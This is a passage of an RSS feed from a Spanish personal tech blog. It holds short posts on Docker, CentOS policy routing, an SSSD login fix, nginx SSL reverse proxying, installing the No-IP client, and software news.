<p>Había visto la película de Will Smith y me dije &ldquo;voy a leerme el libro&rdquo;. Pues, ¡sorpresa! El libro y la película no se parecen en nada. La película fue entretenida, pero el libro es genial. Se trata de un libro de tamaño medio y de fácil lectura que con un poco de dedicación os podéis terminar en un par de días.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Jugando con Docker</title>
      <link>https://www.igalvan.es/posts/jugando-con-docker/</link>
      <pubDate>Mon, 10 Jun 2019 17:47:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/jugando-con-docker/</guid>
      <description><![CDATA[<p>El problema de tener varios equipos y que me encante ir cambiando de distribución cada poco tiempo es que tengo que estar reinstalando mi entorno de Jekyll para poder generar mis sitios estáticos.</p>
<p>He decidido aprovechar mis conocimientos de Docker para de una vez generar una imagen que me permita con un simple comando disponer del entorno sin más que tener que esperar unos segundos a que se genere la imagen y luego lanzar el contenedor correspondiente.</p>
<p>No es gran cosa, pero ahí os dejo el enlace al <a href="https://github.com/igalvit/ghpages">repositorio</a> en mi Github por si a alguno le fuera de interés.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Policy Based Routing en CentOS 7</title>
      <link>https://www.igalvan.es/posts/policy-based-routing-en-centos-7/</link>
      <pubDate>Sat, 25 Aug 2018 19:30:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/policy-based-routing-en-centos-7/</guid>
      <description><![CDATA[<p>Por defecto en los servidores CentOS con multiples interfaces de red todo el tráfico es devuelto por la interface que contenga la ruta por defecto. Este comportamiento no tiene nada de malo hasta que nos encontramos en escenarios donde es obligatorio separar el tráfico.</p>
<h2 id="escenario">Escenario</h2>
<p>En nuestro escenario partimos de la presencia de un servidor con dos interfaces de red, la primera en la red 10.0.2.0/24 que tiene la puerta de enlace por defecto en la IP 10.0.2.2, vamos a llamarla &ldquo;red pública&rdquo;, y la segunda en la red 192.168.56.20/24, vamos a llamarla &ldquo;red de gestión&rdquo;.  Queremos que todo el tráfico de la red de gestión se enrute por la segunda interfaz por temas de seguridad.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#f92672">[</span>root@routes ~<span style="color:#f92672">]</span><span style="color:#75715e"># ip addr show | grep &#34;inet\b&#34; | awk &#39;{print $2&#34; &#34;$NF}&#39;</span>
</span></span><span style="display:flex;"><span>127.0.0.1/8 lo
</span></span><span style="display:flex;"><span>10.0.2.15/24 enp0s3
</span></span><span style="display:flex;"><span>192.168.56.22/24 enp0s8
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>root@routes ~<span style="color:#f92672">]</span><span style="color:#75715e"># ip route|grep default</span>
</span></span><span style="display:flex;"><span>default via 10.0.2.2 dev enp0s3 proto static metric <span style="color:#ae81ff">100</span> 
</span></span></code></pre></div><h2 id="instrucciones">Instrucciones</h2>
<p>Antes de comenzar a configurar PBR, en CentOS 7 es necesario instalar el siguiente paquete:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#f92672">[</span>root@routes ~<span style="color:#f92672">]</span><span style="color:#75715e"># yum install -y NetworkManager-dispatcher-routing-rules</span>
</span></span></code></pre></div><p>El siguiente paso es crear la entrada de la política de enrutado:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#f92672">[</span>root@routes ~<span style="color:#f92672">]</span><span style="color:#75715e"># echo &#34;2 mgt&#34; &gt;&gt; /etc/iproute2/rt_tables</span>
</span></span></code></pre></div><p>El siguiente paso es crear las reglas para la interfaz enp0s8:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#f92672">[</span>root@routes ~<span style="color:#f92672">]</span><span style="color:#75715e"># vi /etc/sysconfig/network-scripts/rule-enp0s8</span>
</span></span><span style="display:flex;"><span>from 192.168.56.22/32 table mgt
</span></span><span style="display:flex;"><span>to 192.168.56.22/32 table mgt
</span></span></code></pre></div><p>El siguiente paso es crear la ruta por defecto para la interfaz enp0s8:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#f92672">[</span>root@routes ~<span style="color:#f92672">]</span><span style="color:#75715e"># vi /etc/sysconfig/network-scripts/route-enp0s8</span>
</span></span><span style="display:flex;"><span>default via 192.168.56.21 dev enp0s8 table mgt
</span></span></code></pre></div><p>Una vez configurado todo, tenemos que recargar la configuración para hacerla efectiva:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#f92672">[</span>root@routes ~<span style="color:#f92672">]</span><span style="color:#75715e"># nmcli connection reload</span>
</span></span></code></pre></div><p>Comrpobamos que todo está configurado según esperabamos:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#f92672">[</span>root@routes ~<span style="color:#f92672">]</span><span style="color:#75715e"># ip rule show</span>
</span></span><span style="display:flex;"><span>0:	from all lookup local 
</span></span><span style="display:flex;"><span>32764:	from all to 192.168.56.22 lookup mgt
</span></span><span style="display:flex;"><span>32765:	from 192.168.56.22 lookup mgt 
</span></span><span style="display:flex;"><span>32766:	from all lookup main 
</span></span><span style="display:flex;"><span>32767:	from all lookup default
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>root@routes ~<span style="color:#f92672">]</span><span style="color:#75715e"># ip route show table mgt</span>
</span></span><span style="display:flex;"><span>default via 192.168.56.21 dev enp0s8 
</span></span></code></pre></div>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Typora. Un gran editor WYSIWYG para Markdown</title>
      <link>https://www.igalvan.es/posts/typora-editor-markdown/</link>
      <pubDate>Fri, 22 Jun 2018 20:30:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/typora-editor-markdown/</guid>
      <description><![CDATA[<p>Hace unos días vi en <a href="https://twitter.com/LXALinuxAdictos">@LXALinuxAdictos</a> que hacían una buena critica a <em>Typora</em> que es un editor WYSIWYG para <em>Markdown</em> y me decidí a probarlo.</p>
<p>Las dos cosas que más me han gustado: su interfaz minimalista y que sea compatible, aparte de <em>MacOS</em>, con <em>GNU/Linux</em> y <em>Windows</em>, que son los dos sistemas operativos con los que trabajo habitualmente.</p>
<p>La verdad es que me ha resultado muy útil sobre todo en mi caso que escribo casi a diario documentación, manuales, etc. Llevo ya tiempo usando <em>Markdown</em>, y aunque es muy sencillo, muchas veces se me hacía complicado imaginar cómo quedaba la composición final y siempre terminaba exportando el documento a HTML o PDF para verificar cómo iba quedando.</p>
<p>Os animo a que lo probéis descargándolo desde su <a href="https://typora.io/">web</a>.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Llega Thunderbird 60 beta. Un breve vistazo</title>
      <link>https://www.igalvan.es/posts/llega-thunderbird-60-beta/</link>
      <pubDate>Sun, 15 Apr 2018 19:00:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/llega-thunderbird-60-beta/</guid>
      <description><![CDATA[<p>Parecía que estaba casi muerto y enterrado, pero no. Cual ave fénix resurge de nuevo y parece que está en forma. Pronto tendremos entre nosotros la nueva versión mayor de <em>Mozilla Thunderbird</em>, esta vez con la versión 60.</p>
<h2 id="aspecto-visual">Aspecto visual</h2>
<p>El aspecto visual es el mismo de siempre, y esto no es bueno. Está bien tener una interfaz conocida, pero hay que adaptarse a los tiempos y un buen lavado de cara le vendría muy bien.</p>
<h2 id="mejoras">Mejoras</h2>
<p>La nueva versión de <em>Thunderbird</em> trae un buen puñado de mejoras. Vamos a comentarlas brevemente:</p>
<ul>
<li>Cuando se está escribiendo un mensaje, un botón de borrado permite eliminar un destinatario. Este botón de borrado se muestra cuando se pone el cursor sobre el selector <em>De/Cc/Cco</em>.</li>
<li>Más mejoras en el manejo de adjuntos durante la composición, <code>Alt+M</code> permite mostrar el panel de adjuntos.</li>
<li><em>Thunderbird</em> ahora permite la conversión de carpetas entre los formatos <em>mbox</em> y <em>maildir</em> y viceversa. De momento, de forma experimental.</li>
<li>Calendario: Permitir copiar, cortar y borrar una ocurrencia seleccionado o la serie entera de eventos recurrentes.</li>
<li>Calendario: Proveer una opción para mostrar localizaciones de eventos en las vistas diaria y semanal.</li>
<li>Calendario: Proveer la habilidad de enviar o no directamente notificaciones de reunión en vez de mostrar una ventana emergente.</li>
<li>Cuando se está escribiendo una dirección, la parte coincidente de la dirección se muestra en negrita.</li>
<li><em>Thunderbird</em> mostrará la opción de compactar las carpetas IMAP incluso si la cuenta está en línea.</li>
</ul>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Reiniciando el blog...</title>
      <link>https://www.igalvan.es/posts/reiniciando-el-blog/</link>
      <pubDate>Thu, 29 Mar 2018 07:55:19 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/reiniciando-el-blog/</guid>
      <description><![CDATA[<p>Otra vez más, empiezo a trabajar en el <em>blog</em>. Ya no sé ni cuántas veces he retomado esta tarea, pero espero que esta vez sea la definitiva.</p>
<p>Estoy aprovechando para recabar los <em>posts</em> antiguos, darle una nueva imagen y sobre todo, un cambio de plataforma de <em>blogging</em> hacía un entorno lo más sencillo posible que me permita centrarme en escribir y olvidar todo lo demás.</p>
<p>Nos vemos pronto, y gracias por estar ahí.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>SQL Server sobre Ubuntu. Comenzando....</title>
      <link>https://www.igalvan.es/posts/sql-server-sobre-ubuntu-comenzando/</link>
      <pubDate>Thu, 15 Dec 2016 19:30:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/sql-server-sobre-ubuntu-comenzando/</guid>
      <description><![CDATA[<p>Nunca pensé que vería una instancia de SQL Server ejecutandose sobre GNU/Linux, pues me equivoqué.<!--excerpt--></p>
<p>Y que equivocación tan agradable, estoy realmente deseoso de probar hasta dónde puede llegar este paso que ha dado Microsoft para llevar su SGBD hasta el sistema operativo del pinguino.</p>
<p>![Image SQL Server sobre Linux]({{ site.url }}/assets/sqlserver_linux.png)</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Probando Ubuntu Budgie 16.10</title>
      <link>https://www.igalvan.es/posts/probando-ubuntu-budgie-1610/</link>
      <pubDate>Thu, 10 Nov 2016 20:39:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/probando-ubuntu-budgie-1610/</guid>
      <description><![CDATA[<p>Revisando mis suscripciones RSS me he encontrado la buena noticia de que un nuevo sabor se incorpora de forma oficial a Ubuntu. Para mi se trataba de una distribución desconocida, así que me he puesto manos a la obra para probarla.</p>
<p>Este es un breve artículo de primeras impresiones, no una revisión exhaustiva, como siempre, lo mejor es que lo probéis por vosotros mismos.</p>
<!--excerpt-->
<h2 id="pros">Pros</h2>
<p>En general, la interfaz de usuario es limpia, moderna, pero vistosa y sencilla. Además muestra una combinación equilibrada de colores tanto en el fondo de escritorio como en el resto de elementos.</p>
<p>La integración de las aplicaciones de GNOME como el Visor de imágenes es buena y casi parece que fueron diseñadas para este escritorio.</p>
<p>Un apartado que me ha gustado bastante son los applets y las notificaciones, creo que han creado una solución simple y elegante que permite disponer de mucha información sin que ocupe espacio en el escritorio, algo que es de agradecer.</p>
<h2 id="contras">Contras</h2>
<p>La verdad es que este apartado va a ser mucho más largo de lo que quisiera.</p>
<p>La integración con algunas aplicaciones como LibreOffice no es del todo correcta, al menos desde mi punto de vista.</p>
<p>La elección de Geary como cliente de correo frente a otras opciones más potentes como Thunderbird tampoco parece acertada.</p>
<p>La aplicación de calendario . En mi caso no pude conectar a una cuenta de Microsoft Exchange para sincronizar mis calendarios, lo que no es muy alentador.</p>
<p>Existen errores poco comprensibles, como que algunas aplicaciones se muestren en el idioma inglés a pesar de que el sistema esté configurado para el idioma español o que muestre temperaturas en grados Farenheit o distancias en millas. Parece un tontería, pero para muchos usuarios no lo es, y menos cuando se intenta ofrecer una imagen de sistema completo e integrado.</p>
<h2 id="resumen">Resumen</h2>
<p>En resumen, sinceramente me he quedado con un sabor agridulce, esperaba encontrarme con un producto que marcara alguna diferencia significativa respecto a los distintos sabores ya disponibles, pero realmente creo que solo veo un GNOME con una imagen diferente, pero que tampoco aporta nada que me haga sorprenderme. Además tiene algunos errores de bulto como los problemas de integración de las aplicaciones con el idioma español.</p>
<p>Esperemos que con su incorporación a la familia oficial de Ubuntu, se corrijan estas deficiencias y alcance un grado de madurez tan alto como sus hermanos mayores.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Error &#39;Access denied&#39; al validar contra Directorio Activo usando SSSD</title>
      <link>https://www.igalvan.es/posts/error-access-denied-al-validar-contra/</link>
      <pubDate>Mon, 29 Aug 2016 17:00:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/error-access-denied-al-validar-contra/</guid>
      <description><![CDATA[<p>He configurado mi equipo con Ubuntu 16.04 para que validara contra un dominio de Servicios de Directorio Activo y al cabo de un par de días no podía validar y me mostraba el error <em>&ldquo;Access denied for user <usuario>: 4 (Permission denied)</usuario>&rdquo;</em>.</p>
<p>La solución al problema es bastante sencilla. Hay que iniciar una sesión con un usuario local y proceder a editar el fichero <code>/etc/sssd/sssd.conf</code> y añadir la línea <code>ad_gpo_access_control = permissive</code>. Tras reiniciar el servicio SSSD, ya podremos iniciar sesión en el equipo con las credenciales de Directorio Activo.</p>
<p>En mi caso el origen del problema era la aplicación de las GPO de la rama donde está el objeto del equipo, que estaba dejandome sin los suficientes permisos para poder acceder al equipo.</p>
<p>Aunque esta no sea la mejor solución del mundo, dado que arreglarlo me va a llevar algún tiempo pesto que no tengo claro qué GPO me está quitando los permisos, de momento me sirve como un apaño.</p>
<p>Si queréis más información sobre este tema, podéis consultar el enlace siguiente:
<a href="https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/7/html/Windows_Integration_Guide/sssd-gpo.html">https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/7/html/Windows_Integration_Guide/sssd-gpo.html</a>{:target=&quot;_blank&quot;}</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>CodinGame, una forma divertida de aprender a programar</title>
      <link>https://www.igalvan.es/posts/codingame-una-forma-divertida-de/</link>
      <pubDate>Sun, 03 Apr 2016 20:29:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/codingame-una-forma-divertida-de/</guid>
      <description><![CDATA[<p>Aprender a programar puede ser una tarea tediosa y cualquier ayuda que lo haga un poco más divertido es una buena noticia.</p>
<p>En <em>CodinGame</em> he encontrado una de estas ayudas, y lo han conseguido generando ejercicios de programación clásicos como si fueran tareas parte del diseño de pequeños videojuegos.</p>
<p>Me parece una iniciativa muy positiva, y la verdad es que estoy enganchado a esta web mientras voy aprendiendo <em>Python</em>.</p>
<p>Os dejo el enlace:
<a href="https://www.codingame.com/">https://www.codingame.com/</a>{:target=&quot;_blank&quot;}</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Windows Server 2016 incluirá tecnología de contenedores</title>
      <link>https://www.igalvan.es/posts/windows-server-2016-incluira-tecnologia/</link>
      <pubDate>Fri, 11 Mar 2016 19:28:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/windows-server-2016-incluira-tecnologia/</guid>
      <description><![CDATA[<p>La virtualización ligera ha llegado a <em>Windows Server</em>. La próxima versión, <em>Windows Server 2016</em>, incluirá la capacidad de generar contenedores para virtualizar aplicaciones. La gran novedad es que no sólo lo hará a nivel de sistema operativo del host, sino también a nivel de las máquinas virtuales de <em>Hyper-V</em>.</p>
<p>Más información:
<a href="http://blogs.itpro.es/diazantuna/2016/03/11/windows-server-2016-containers">http://blogs.itpro.es/diazantuna/2016/03/11/windows-server-2016-containers</a>{:target=&quot;_blank&quot;}</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Activar el salvapantallas mediante la combinación Ctrl-Alt-L en Lubuntu</title>
      <link>https://www.igalvan.es/posts/activar-el-salvapantallas-mediante-la/</link>
      <pubDate>Thu, 11 Feb 2016 21:43:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/activar-el-salvapantallas-mediante-la/</guid>
      <description><![CDATA[<div style="text-align: justify;">Se trata de algo sencillo y que ya viene configurado por defecto en Ubuntu, pero que por algún motivo que desconozco no lo está en Lubuntu. La idea es que cuando se pulse la combinación de teclas Control&nbsp;+ Alt&nbsp;+ L, se active el bloqueo de pantalla.</div><ol><li>Abre el fichero <kbd>~/.config/openbox/lubuntu-rc.xml</kbd></li><li>Añade el siguiente código entre las etiquetas <code>&lt;keyboard&gt;</code> y <code>&lt;/keyboard&gt;</code></li><pre style="background: #f0f0f0; border: 1px dashed #cccccc; color: black; font-family: &quot;arial&quot;; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> &lt;keybind key="C-A-L"&gt;  <br />  &lt;action name="Execute"&gt;  <br />   &lt;command&gt;lxlock&lt;/command&gt;  <br />  &lt;/action&gt;  <br /> &lt;/keybind&gt;  <br /></code></pre><li><code><span style="font-family: &quot;times new roman&quot;;">Por último ejecuta desde la consola el comando&nbsp;</span><kbd>openbox --reconfigure</kbd></code><span style="font-family: &quot;times new roman&quot;;">.</span></li></ol>Y ya está. Sencillo, ¿verdad?]]></description>
      
    </item>
    
    
    
    <item>
      <title>Parece que los Lumia con WP 8 se actualizarán a W10</title>
      <link>https://www.igalvan.es/posts/parece-que-los-lumia-con-wp-8-se/</link>
      <pubDate>Fri, 14 Nov 2014 11:34:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/parece-que-los-lumia-con-wp-8-se/</guid>
      <description><![CDATA[<p>Link: <a href="https://twitter.com/Kalars07/status/532891275851489280">Parece que los Lumia con WP 8 se actualizarán a W10</a><br/><br/>    <p>Todo surge por una pregunta enviada por @Kalars07 a @lumia en #Twitter, y se ha armado el follón porque han confirmado que van a actualizar todos los dispositivos #Windows #Phone 8 a Windows 10. Una muy buena noticia después de ver como los usuarios de #WP7 se quedaban estancados cuando salió #WP8.</p></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Microsoft convierte en software libre el núcleo de .Net</title>
      <link>https://www.igalvan.es/posts/microsoft-convierte-en-software-libre/</link>
      <pubDate>Thu, 13 Nov 2014 13:08:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/microsoft-convierte-en-software-libre/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.wired.com/2014/11/microsoft-open-sources-net-says-will-run-linux-mac/">Microsoft convierte en software libre el núcleo de .Net</a><br/><br/>    <p>Si alguien me dice hace cinco años que <em>Microsoft</em> apostaría por abrir el <em>core</em> de .<em>Net</em> me hubiera reído en su cara. Buena noticia para los que apoyamos el <em>software</em> libre, pero habrá que ver cómo se desarrolla, que ya sabemos como se las gasta el gigante de <em>Redmond</em> a la hora de cumplir sus promesas.</p></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>El proyecto interminable… | Daniel Echeverría</title>
      <link>https://www.igalvan.es/posts/el-proyecto-interminable-daniel/</link>
      <pubDate>Mon, 10 Nov 2014 13:39:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/el-proyecto-interminable-daniel/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.danielecheverria.com/index.php/el-proyecto-interminable/">El proyecto interminable… | Daniel Echeverría</a><br/><br/>    <p>El terror de cualquier gestor de proyectos, los proyectos “y ya que…”, proyectos que nunca se acaban y que siempre tienen tareas e hitos pendientes de realizar y cuando no, se añaden más. Una autentica pesadilla.</p></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Mozilla Introduces the First Browser Built For Developers: Firefox Developer Edition</title>
      <link>https://www.igalvan.es/posts/mozilla-introduces-first-browser-built/</link>
      <pubDate>Mon, 10 Nov 2014 13:03:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/mozilla-introduces-first-browser-built/</guid>
      <description><![CDATA[<p>Link: <a href="https://hacks.mozilla.org/2014/11/mozilla-introduces-the-first-browser-built-for-developers-firefox-developer-edition/">Mozilla Introduces the First Browser Built For Developers: Firefox Developer Edition</a><br/><br/>    <p>Mozilla ha publicado un navegador web que es una suite completa para desarrolladores, Firefox Developer Edition. No he podido probarla de momento, pero seguro que lo haré en breve, una buena excusa para retomar la programación web que tan olvidada tengo.</p></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>73000 cámaras IP con la configuración de seguridad por defecto</title>
      <link>https://www.igalvan.es/posts/73000-camaras-ip-con-la-configuracion/</link>
      <pubDate>Fri, 07 Nov 2014 22:53:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/73000-camaras-ip-con-la-configuracion/</guid>
      <description><![CDATA[<p>A veces nos volvemos paranoicos con nuestra #privacidad como está sucediendo el caso de la doble verificación de #<em>WhatsApp</em> y otras veces nos olvidamos de ella, tanto que compramos un cacharro como una #cámara #IP que abre las puertas de nuestra casa al mundo y dejamos la configuración de #seguridad por defecto.</p><br/><p>Si no te lo crees, en esta página web encontrarás más de 73000 cámaras abiertas al mundo con las credenciales por defecto del fabricante.</p><br/><p><a href="http://insecam.com/" target="_blank">http://insecam.com/</a></p>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Configurar nginx con SSL como proxy inverso</title>
      <link>https://www.igalvan.es/posts/configurar-nginx-con-ssl-como-proxy/</link>
      <pubDate>Thu, 06 Nov 2014 21:39:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/configurar-nginx-con-ssl-como-proxy/</guid>
      <description><![CDATA[<p>El caso es que tengo una aplicación que tiene una interfaz web para su administración pero sus autores no implementaron el soporte para SSL. Como no me gusta facilitar las cosas a los amigos de lo ajeno que se dedican a intentar perjudicar a los demás habitantes de este mundo que conocemos como Internet, hoy voy a explicaros como utilizar esta pequeña navaja suiza conocida como nginx.</p>
<p>Como todo lo que publico, el tutorial está pensado para ser utilizado en <em>Ubuntu Server</em>.</p>
<h2 id="instalar-nginx">Instalar nginx</h2>
<p>El primer paso es instalar nginx en el servidor, si no lo tenemos ya hecho.</p>
<pre tabindex="0"><code>sudo apt-get update
sudo apt-get install nginx
</code></pre><h2 id="crear-un-certificado">Crear un certificado</h2>
<p>En mi caso, dado que es un servidor casero donde se usa, voy a generar un certificado autofirmado desde el propio equipo:</p>
<pre tabindex="0"><code>sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/nginx/cert.key -out /etc/nginx/cert.crt
</code></pre><h2 id="modificar-la-configuración">Modificar la configuración</h2>
<p>Vamos a modificar la configuración para que cuando un usuario se conecte por el puerto 443 mediante HTTP seguro, haga un proxy a la aplicación que escucha por el puerto 2000 en plano.</p>
<p><code>sudo vi /etc/nginx/sites-enabled/default</code></p>
<p>Dentro del fichero modificamos la configuración para que se parezca a esta:</p>
<pre tabindex="0"><code>server {
 listen 80;
 return 301 https://$host$request_uri;
 }
server {
listen 443;
 server_name xxxxx.yyyyy.zzz;
ssl_certificate /etc/nginx/cert.crt;
 ssl_certificate_key /etc/nginx/cert.key;
ssl on;
 ssl_session_cache builtin:1000 shared:SSL:10m;
 ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
 ssl_ciphers HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4;
 ssl_prefer_server_ciphers on;
access_log /var/log/nginx/miweb.access.log;
location / {
proxy_set_header Host $host;
 proxy_set_header X-Real-IP $remote_addr;
 proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
 proxy_set_header X-Forwarded-Proto $scheme;
# Fix the “It appears that your reverse proxy set up is broken&#34; error.
proxy_pass http://localhost:8080;
proxy_read_timeout 90;
proxy_redirect http://localhost:8080 https://xxxxx.yyyyy.zzz;
 }
 }
</code></pre><h2 id="recargar-la-configuración-y-probar">Recargar la configuración y probar</h2>
<p>Primero probamos que la configuración sea estructuralmente correcta y luego recargamos la configuración de nginx mediante los siguientes comandos:</p>
<pre tabindex="0"><code>nginx -t
service nginx restart
</code></pre><p>y probamos desde nuestro navegador a acceder a la URL https://miservidor/</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Hispasec @unaaldia: Inteco pasa a llamarse Incibe</title>
      <link>https://www.igalvan.es/posts/hispasec-unaaldia-inteco-pasa-llamarse/</link>
      <pubDate>Sat, 01 Nov 2014 08:30:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/hispasec-unaaldia-inteco-pasa-llamarse/</guid>
      <description><![CDATA[<p>Link: <a href="http://unaaldia.hispasec.com/2014/10/inteco-pasa-llamarse-incibe.html">Hispasec @unaaldia: Inteco pasa a llamarse Incibe</a><br/><br/>    <p>El Instituto Nacional de Tecnologías de la Comunicación, S.A. (INTECO) ha pasado a llamarse INCIBE (Instituto Nacional de Ciberseguridad), al centrar todas sus funciones en el ámbito de la seguridad.</p></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Instalar el cliente de No-IP en Ubuntu 14.04</title>
      <link>https://www.igalvan.es/posts/instalar-el-cliente-de-no-ip-en-ubuntu/</link>
      <pubDate>Wed, 29 Oct 2014 21:44:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/instalar-el-cliente-de-no-ip-en-ubuntu/</guid>
      <description><![CDATA[<p>Montando un pequeño servidor para acceder a la red interna de mi casa me he visto en la necesidad de instalar el cliente de No-IP para poder disponer de un nombre DNS más fácil de recordar que la IP de mi conexión de <em>Internet</em> que además cambia cada cierto tiempo. ;-)</p>
<p>Aunque la máquina tiene instalada <em>Ubuntu</em> 14.04, el proceso que explico a continuación es valido para muchas otras distribuciones.</p>
<p>El primer paso, que ya se que no es recomendable, es elevar tus privilegios a <em>root</em>. Si no quieres hacerlo siempre puedes añadir <code>sudo</code> delante de los comandos que necesiten los privilegios.</p>
<p><code>sudo -i</code></p>
<p>Descargamos el paquete con el código fuente desde la propia <em>web</em> deNo-IP y proceder a descomprimirlo:</p>
<pre tabindex="0"><code>cd /usr/local/src/
wget http://www.no-ip.com/client/linux/noip-duc-linux.tar.gz
tar xf noip-duc-linux.tar.gz
ls
</code></pre><p>Accedemos al directorio que hemos descomprimido:</p>
<p><code>cd  noip-2.1.9-1/</code></p>
<p>Compilamos e instalamos el binario:</p>
<p><code>make install</code></p>
<p>Durante el proceso de instalación nos preguntará por los parametros de configuración. Podemos indicar cualquier cosa porque volveremos a reconfigurar el cliente después de que termine de instarlo.</p>
<p>Una vez haya terminado de compilar e instalar el cliente ejecutaremos el siguiente comando para configurar el cliente:</p>
<p><code>/usr/local/bin/noip2 -C</code></p>
<p>Y se nos pedirán los siguientes datos:</p>
<pre tabindex="0"><code>Please enter the login/email string for no-ip.com xxxxxx
Please enter the password for user &#39;xxxxxx&#39; ****************
Only one host [xxxxxxxxxx.xxxx.xx is registered to this account.
It will be used.
Please enter an update interval:[30] 
Do you wish to run something at successful update?[N] (y/N) n
New configuration file &#39;/usr/local/etc/no-ip2.conf&#39; created.
</code></pre><p>El siguiente paso es crear el servicio para que arranque automáticamente en el inicio del sistema operativo:</p>
<p><code>nano /etc/init.d/noip</code></p>
<p>Copiamos y pegamos esta configuración dentro del editor <em>nano</em>:</p>
<pre tabindex="0"><code>#######################################################
 #! /bin/sh
 case &#34;$1&#34; in
 start)
 echo &#34;Starting noip2&#34;
 /usr/local/bin/noip2
 ;;
 stop)
 echo -n &#34;Shutting down noip2&#34;
 for i in `noip2 -S 2&gt;&amp;1 | grep Process | awk &#39;{print $2}&#39; | tr -d &#39;,&#39;`
 do
 noip2 -K $i
 done
 ;;
 *)
 echo &#34;Usage: $0 {start|stop}&#34;
 exit 1
 esac
 exit 0
 #######################################################
</code></pre><p>Para guardar las modificaciones lo hacemos con <code>Ctrl+X</code>. Ahora cambiamos los permisos del <em>script</em> y probamos su ejecución:</p>
<pre tabindex="0"><code>chmod 700 /etc/init.d/noip
sudo /etc/init.d/noip stop
sudo /etc/init.d/noip start
</code></pre><p>Editamos el fichero del proceso de arranque de <em>Ubuntu</em>:</p>
<p><code>nano /etc/rc.local</code></p>
<p>Ponemos en la línea por encima de la línea <code>exit 0</code> el siguiente comando:</p>
<p><code>/etc/init.d/noip start</code></p>
<p>Para guardar las modificaciones lo hacemos con <code>Ctrl+X</code>. Y con este paso se finaliza la instalación. Para comprobar que está funcionando correctamente puedes probar con el comando <code>nslookup</code> para verificar que se actualiza correctamente la entrada DNS en los servidores de No-IP.</p>
<p><code>nslookup xxxxxxxxxx.xxxx.xx</code></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Nginx cumple 10 años con un crecimiento del 400% en los últimos 4 años</title>
      <link>https://www.igalvan.es/posts/nginx-cumple-10-anos-con-un-crecimiento/</link>
      <pubDate>Tue, 28 Oct 2014 21:46:00 +0100</pubDate>
      
